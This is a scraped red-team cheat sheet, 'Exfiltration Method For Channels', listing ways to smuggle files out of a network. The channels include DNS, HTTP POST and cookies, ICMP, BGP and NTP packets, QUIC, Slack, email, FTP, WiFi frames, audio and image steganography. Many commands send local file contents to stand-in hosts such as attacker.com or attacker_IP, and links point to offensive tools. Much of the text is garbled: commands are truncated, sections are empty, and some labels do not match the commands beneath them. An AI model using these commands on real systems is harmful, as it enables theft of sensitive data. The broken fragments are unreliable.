Professional Documents
Culture Documents
Exfiltration Method For Channels
Exfiltration Method For Channels
IO
RedTeamRecipe
Red Team Recipe for Fun & Profit.
Follow
DNS Tunneling
1. Using nslookup on Linux/macOS:
1 nslookup SensitiveData.attacker.com
[System.Net.Dns]::GetHostAddresses("SensitiveData.attacker.com") | ForEach-
1
Object { $_.ToString() }
This one would send 45 bytes per subdomain, of which there are 4 in the query. 15
bytes reserved for filename at the end.
1 python dnsteal.py 127.0.0.1 -z -v -b 45 -s 4 -f 15
$encodedData =
1 [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\path\to\fil
2 Invoke-RestMethod -Uri "http://attacker.com/exfil" -Method POST -Body
"data=$encodedData"
Covert Channels
1. Using steghide on Linux to embed data in an image:
java -jar OpenStego.jar embed -a LSB -mf image.png -cf cover.png -ef
1
secret.txt -p password
Cloud Storage
1. Using AWS CLI to upload a file to S3:
Remote Desktop
1. Using xfreerdp on Linux to copy a file from the remote machine:
SSH Tunneling
1. Using scp on Linux/macOS to copy a file through SSH tunneling:
1. Using an online QR code generator: Many online tools allow you to create QR
codes by inputting text. You can copy the generated QR code image.
https://github.com/Shell-Company/QRExfil
Voice Exfiltration
1. Using sox on Linux to convert a text file to speech:
Printer Watermarking
1. Using pdftk on Linux to add a watermark to a PDF file:
1. Using online tools: There are online tools that allow you to upload a PDF and
add a watermark. Search for “online PDF watermarking tool” to find suitable
options.
1 nfc-send /path/to/local/file.txt
Open the file you want to share, then tap the devices together to initiate
1
NFC data transfer.
1. Using third-party apps on mobile devices: There are various apps available
on app stores that allow you to send files through NFC. Search for “NFC file
transfer” apps suitable for your platform.
1 scrot screenshot.png
1 screencapture screenshot.png
1 cp /path/to/local/file.txt /media/usb-drive/
IPFS
1. Using IPFS and Ethereum Smart Contract:
1. Using ipfs command-line tool to add a file to IPFS and store hash on
Ethereum:
LNK Data
1 lnkup.py --host localhost --type ntlm --output out.lnk
WebSocket
1 exfiltrate websocket /path/to/local/file.txt
All-in-One
1. Using exfiltrate via DNS:
https://github.com/s0i37/exfiltrate
Encrypted All-in-One
1. Using CloakifyFactory to exfiltrate data using DNS covert channel:
https://github.com/TryCatchHCF/Cloakify
DLP failures
1. Using DET to exfiltrate data via DNS requests:
/path/to/local/file.txt
text-based steganography
1. Using PacketWhisper to exfiltrate data via ICMP covert channel:
[attacker_IP]
[attacker_domain]
http://attacker.com/upload
/path/to/local/file.txt -a [attacker_IP]
-d [attacker_domain]
/path/to/local/file.txt -u http://attacker.com/upload
-d [attacker_domain]
-u http://attacker.com/upload
NC Based
1. Using sg1 to exfiltrate data via ICMP covert channel:
[username] -p [password]
[username] -p [password]
exfiltration/infiltration toolkit
1. Infiltration (File upload)
1. Dns-to-Tcp WIP
1. Dns-Shellcode
1 cl /c lib\qrcodegen.c
2 cl /c qr_upload.c
3 link /out:qr_upload.exe qr_upload.obj qrcodegen.obj
4 chcp 866
5 set TIMEOUT=1000
6 set SIZE=100
7 qr_upload.exe c:\path\to\secret.bin
1 gcc -c lib/qrcodegen.c
2 gcc -c qr_upload.c
3 gcc qr_upload.c qrcodegen.o -o qr_upload
4 setterm -background white
5 setterm -foreground black
6 TIMEOUT=1000 SIZE=100 ./qr_upload /path/to/secret.bin
1 setxkbmap us
2 cat /tmp/test.txt | ./text_send.sh
3 cat /tmp/test.bin | base64 | ./text_send.sh
Atmega 32u4/ESP8266
Commenting code:
–“Rem: Comment”
–Set comments
https://github.com/exploitagency/ESPloitV2
exfil.log
encrypted.log
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet -o
exfil.log
my_custom_agent" -o user_agent.log
HTTP Cookie
1. Using cURL on Linux/macOS to send data as a cookie:
http://attacker.com
Content 'C:\path\to\local\file.txt')"}
https://github.com/ytisf/PyExfil
NTP Body
1. Using ntpdate on Linux to send data in NTP packet body:
BGP Open
1. Using Python to send data in BGP Open message fields:
send(IP(dst='attacker_IP')/TCP(dport=179)/BGPHeader(marker=0xffffffffffffffff
,msg_len=32)/BGPOpen(version=4,asn=65535,hold_time=180, id='0.0.0.0',
params='/path/to/local/file.txt'))"
1. Using hping3 to send data in BGP Open message fields:
--flood -V attacker_IP
send(IP(dst='attacker_IP')/TCP(dport=179)/BGPHeader(marker=0xffffffffffffffff
,msg_len=32)/BGPOpen(version=4,asn=65535,hold_time=180, id='0.0.0.0',
params='/mnt/c/path/to/local/file.txt'))"
After launching, configure the client to use the proxy and accept the custom
certificate.
1. Using Fiddler to intercept HTTPS traffic and replace the certificate: Install
Fiddler, enable HTTPS decryption, and import your certificate for the target
domain.
QUIC - No Certificate
1. Using scapy in Python to send QUIC packets without encryption:
send(IP(dst='attacker_IP')/UDP(sport=12345, dport=443)/Raw(load='GET
/path/to/local/file.txt'))"
-V attacker_IP
Slack Exfiltration
1. Using Slack API to send a message with data:
curl -X POST -H "Authorization: Bearer YOUR_SLACK_TOKEN" -H "Content-Type:
/path/to/local/file.txt)"}' https://slack.com/api/chat.postMessage
POP3 Authentication
1. Using Python’s smtplib to send an email via POP3 authentication:
'your_password'); server.sendmail('from_email@example.com',
/path/to/local/file.txt)'); server.quit()"
"/path/to/local/file.txt" -u "your_email@example.com:your_password"
1. Using Python with smtplib on Windows Subsystem for Linux (WSL) to send
an email via POP3 authentication:
'your_password'); server.sendmail('from_email@example.com',
/mnt/c/path/to/local/file.txt)'); server.quit()"
FTP MKDIR
1. Using curl to create directories with encoded data in the FTP server:
1. Using wget to create directories with encoded data in the FTP server:
base64)"
1. Using Python to create directories with encoded data in the FTP server:
dst='[destination_IP]')/Raw(load='$(cat /path/to/local/file.txt)'))"
[destination_IP]
HTTP Response
1. Using curl to send data in an HTTP response header:
http://attacker.com
%1
/tmp/response.txt
MAP_Draft
NTP Request
1. Using ntpdate on Linux to send data in NTP packet requests:
echo -n "$(cat /path/to/local/file.txt)" | xxd -p | sed 's/\(..\)/\1 /g' |
('224.0.0.252', 5355))"
[DropBox_LSP_server_IP]
('[DropBox_LSP_server_IP]', 5355))"
/path/to/local/file.txt).example.com"
[target_IP] -r {} -s [sender_IP]
sendp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op=1, psrc='[spoofed_source_IP]',
hwtype=0x1)/Raw(load='$(cat /path/to/local/file.txt)'))"
JetDirect
1. Using netcat (nc) to send data as a print job to a JetDirect printer:
"@/path/to/local/file.txt" "https://attacker.com"
https://attacker.com:4433
MDNS Query
1. Using avahi-resolve on Linux to send data in mDNS queries:
{}.$(cat /path/to/local/file.txt)" -4
/path/to/local/file.txt)"
{}.$(cat /path/to/local/file.txt)"
AllJoyn
1. Using aj_send tool to send data over AllJoyn:
/path/to/local/file.txt)
1. Using Python with the alljoyn library to send data over AllJoyn:
service = aj.create_service('org.example.ExfiltrationService');
aj.register_interface(iface); service.setup()"
$(cat /path/to/local/file.txt)
DNSQ
1. Using dig to send data in DNS queries:
play output.wav
WiFi - On Payload
1. Using Scapy in Python to send data via WiFi frames:
addr1='[destination_MAC]', addr2='[source_MAC]',
addr3='[destination_MAC]')/Raw(load='$(cat /path/to/local/file.txt)'),
iface='wlan0')"
{}
MAC_HEADER_CAPTURE.pcap
3.5mm Jack
1. Using play from sox to transmit audio through the 3.5mm jack:
signed -B -q -
Install a tone generator app on your smartphone, load the file, and play it
Binary Offset
1. Using xxd to encode data as binary and print specific offsets:
"0x{} "
File.read("/path/to/transcript.txt")})'
python -c "braille_dict = {'a': '⠁', 'b': '⠃', 'c': '⠉', 'd': '⠙', 'e': '⠑',
'f': '⠋', 'g': '⠛', 'h': '⠓', 'i': '⠊', 'j': '⠚'}; text =
print(braille_text)"
1. Using sed and Unicode Braille characters to convert a text file into Braille:
awk '{gsub(/./,"& "); for (i=1; i<=NF; i++) { if ($i == "a") $i="⠁"; else if
($i == "b") $i="⠃"; else if ($i == "c") $i="⠉"; else if ($i == "d") $i="⠙";
else if ($i == "e") $i="⠑"; else if ($i == "f") $i="⠋"; else if ($i == "g")
$i="⠛"; else if ($i == "h") $i="⠓"; else if ($i == "i") $i="⠊"; else if ($i
PNG Transparency
1. Using steghide to embed data in the alpha channel of a PNG image:
1. Using zsteg to extract data from the alpha channel of a PNG image:
1. Using zsteg to extract data from the least significant bits of an image:
1. Using Python with the PIL library to embed data in the least significant bits
of an image: